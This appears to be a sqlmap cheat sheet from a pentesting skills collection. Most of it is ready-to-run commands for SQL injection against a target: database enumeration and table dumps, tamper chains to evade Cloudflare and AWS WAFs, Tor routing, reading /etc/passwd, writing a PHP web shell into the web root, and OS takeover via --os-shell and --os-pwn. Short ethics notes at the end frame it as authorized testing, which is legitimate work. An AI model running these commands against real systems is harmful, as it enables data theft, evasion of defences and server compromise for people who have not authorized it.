The SQL injection swiss army knife.
pipx install sqlmap
# Or git
git clone https://github.com/sqlmapproject/sqlmap# Test a URL parameter
sqlmap -u "https://target.com/page?id=1"
# Batch mode (no prompts)
sqlmap -u "https://target.com/page?id=1" --batch
# From request file (RECOMMENDED — captures cookies, headers)
sqlmap -r request.txt --batchIn Burp, right-click any request → "Copy to file". Save as request.txt. Then:
sqlmap -r request.txt --batch --level 3 --risk 2# Levels (1-5) — depth of tests
# 1 = quick check (default)
# 3 = thorough (recommended)
# 5 = paranoid (slow)
# Risks (1-3) — dangerous tests
# 1 = safe (default)
# 2 = include UNION attacks
# 3 = include time-based attacks
sqlmap -r request.txt --batch --level 3 --risk 2# Test specific parameter
sqlmap -u "URL" -p id
# Test multiple
sqlmap -u "URL" -p "id,username"
# All parameters
sqlmap -u "URL" -p "*"
# Cookie params
sqlmap -u "URL" --cookie="session=X; theme=Y" -p theme
# JSON body
sqlmap -u "URL" --data='{"id":1}' --headers="Content-Type: application/json"
# HTTP headers
sqlmap -u "URL" --headers="X-Forwarded-For: *"# Cookie
sqlmap -u "URL" --cookie="session=ABC123"
# HTTP Basic
sqlmap -u "URL" --auth-type=Basic --auth-cred="user:pass"
# Form-based auth (auto-detect login)
sqlmap -u "URL" --auth-url="https://target.com/login" \
--auth-data="username=admin&password=pass"
# OAuth token
sqlmap -u "URL" --headers="Authorization: Bearer eyJhbGci..."# Specific technique
sqlmap -r request.txt --technique=BEUSTQ
# B = Boolean-blind
# E = Error-based
# U = UNION
# S = Stacked queries
# T = Time-based blind
# Q = inline queries
# Only time-based (when blind)
sqlmap -r request.txt --technique=T# Tell sqlmap the DB to skip detection
sqlmap -r request.txt --dbms=mysql
# Options: mysql, postgresql, mssql, oracle, sqlite, sybase, mariadb, h2,
# informix, hsqldb, mckoi, ibm_db2, firebird, monetdb, cubrid,
# maxdb, intersystems_cache# All DBs
sqlmap -r request.txt --batch --dbs
# Tables in a DB
sqlmap -r request.txt --batch -D mydb --tables
# Columns in a table
sqlmap -r request.txt --batch -D mydb -T users --columns
# Dump a table
sqlmap -r request.txt --batch -D mydb -T users --dump
# Dump with conditions
sqlmap -r request.txt --batch -D mydb -T users --dump --where "id=1"
# Current user / DB
sqlmap -r request.txt --batch --current-user --current-db
# Privileges
sqlmap -r request.txt --batch --privileges
# Roles (Oracle)
sqlmap -r request.txt --batch --roles
# All
sqlmap -r request.txt --batch --all# List all tampers
sqlmap --list-tamper
# Use specific tamper
sqlmap -r request.txt --tamper=space2comment
# Chain tampers
sqlmap -r request.txt --tamper=space2comment,between,randomcase
# Common combinations:
# Cloudflare-aware
sqlmap -r request.txt --tamper=space2comment,between,randomcase --random-agent
# AWS WAF
sqlmap -r request.txt --tamper=charencode,space2comment --random-agent
# Generic strong
sqlmap -r request.txt --tamper=space2comment,charunicodeencode,randomcase
# claude-cybersecurity-skills custom (after install)
sqlmap -r request.txt --tamper=ccs_random_case_between
sqlmap -r request.txt --tamper=ccs_double_url_encode
sqlmap -r request.txt --tamper=ccs_unicode_encode# Delay between requests (seconds)
sqlmap -r request.txt --delay=1
# Random User-Agent
sqlmap -r request.txt --random-agent
# Use Tor
sqlmap -r request.txt --tor --tor-type=SOCKS5 --tor-port=9050
# Use proxy (Burp)
sqlmap -r request.txt --proxy="http://127.0.0.1:8080"
# Threads
sqlmap -r request.txt --threads=10
# Timeout
sqlmap -r request.txt --timeout=30 --retries=3# Read file from DB host
sqlmap -r request.txt --file-read="/etc/passwd"
# Write file
sqlmap -r request.txt --file-write="shell.php" --file-dest="/var/www/html/shell.php"
# OS shell (DBA + write needed)
sqlmap -r request.txt --os-shell
# OS pwn (full takeover, Windows mostly)
sqlmap -r request.txt --os-pwn
# OS command
sqlmap -r request.txt --os-cmd="id"# Save findings dir
sqlmap -r request.txt --output-dir=./loot/
# Specific DBMS test order
sqlmap -r request.txt --dbms=mysql --batch
# Force show stack trace
sqlmap -r request.txt -v 6# 1. From Burp request → save as request.txt
# 2. Initial check
sqlmap -r request.txt --batch --level 3 --risk 2
# 3. If vulnerable, enumerate
sqlmap -r request.txt --batch --dbs
# 4. Dump a SAMPLE for PoC (not entire DB!)
sqlmap -r request.txt --batch -D target_db -T users --dump --where "id=1"
# 5. Stop. Don't extract more than needed. Report.- Running on production without rate limits. You'll DOS or get banned.
- Dumping entire databases. Ethical violation; one row proves the bug.
- Trusting sqlmap output blindly. Verify with manual payloads.
- No WAF bypass when WAF detected. Always try tampers.
- No
--leveland--risk. Defaults are weak.
Located at arsenal/sqlmap-tampers/:
ccs_random_case_between.py— case randomization + BETWEEN bypass + space-to-/**/ — multi-layer Cloudflare bypassccs_unicode_encode.py— Unicode escape sequences for SQL keywordsccs_double_url_encode.py— double URL-encode dangerous chars (WAF-decode-once bypass)
Install (run from repo root):
cp arsenal/sqlmap-tampers/*.py "$(pipx environment --value PIPX_LOCAL_VENVS)/sqlmap/lib/python*/site-packages/sqlmap/tamper/"Then:
sqlmap -r request.txt --tamper=ccs_random_case_betweenLook for:
[INFO] testing 'X' parameter
[INFO] heuristic detected
[INFO] confirmed
[INFO] target was found vulnerable to
Type: blind
Title: AND boolean-based blind - WHERE or HAVING clause
Save the exact payload sqlmap used → use in your PoC report.
- Test only authorized targets
- Don't dump production DBs — sample is enough
- Throttle queries on rate-limited targets
- If you accidentally got more data than intended, delete it and note in report